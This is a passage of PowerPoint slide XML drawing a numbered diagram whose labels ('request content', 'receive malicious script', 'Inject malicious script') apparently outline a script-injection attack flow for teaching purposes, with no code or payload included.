      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="4865417"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3122839" y="4088279"/>
            <a:ext cx="1780337" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-172" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2399357" y="4595477"/>
            <a:ext cx="2600061" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="-2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="-2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="176405" y="365013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8229" y="128133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356784" y="236879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2778214" y="3757967"/>
            <a:ext cx="290497" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="174796" y="364896"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8639" y="126595"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29695" y="82385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60558" y="46496"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99040" y="20052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142950" y="4179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238300" y="8639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300562" y="43243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344843" y="99039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364400" y="167534"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="363833" y="203150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356257" y="238300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335200" y="282510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304337" y="318399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265856" y="344843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221946" y="360716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="174796" y="364896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="126596" y="356257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82385" y="335200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46496" y="304337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20053" y="265856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4179" y="221946"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="174796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8639" y="126595"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2148926" y="4140789"/>
            <a:ext cx="291738" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1845129" y="4356419"/>
            <a:ext cx="3260725" cy="1130300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3260725" h="1130300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3260270" y="1129980"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1777782" y="4322292"/>
            <a:ext cx="122520" cy="89301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5631877" y="1905000"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477086" y="2752725"/>
            <a:ext cx="1905" cy="1704339"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1904" h="1704339">
                <a:moveTo>
                  <a:pt x="1501" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="1703884"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6430691" y="4410159"/>
            <a:ext cx="92844" cy="116893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6854825" y="3291840"/>
            <a:ext cx="1052830" cy="939800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Inject  malicious  script</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6750050" y="2865438"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="4724400"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="73025" y="4731702"/>
            <a:ext cx="2123440" cy="1787525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
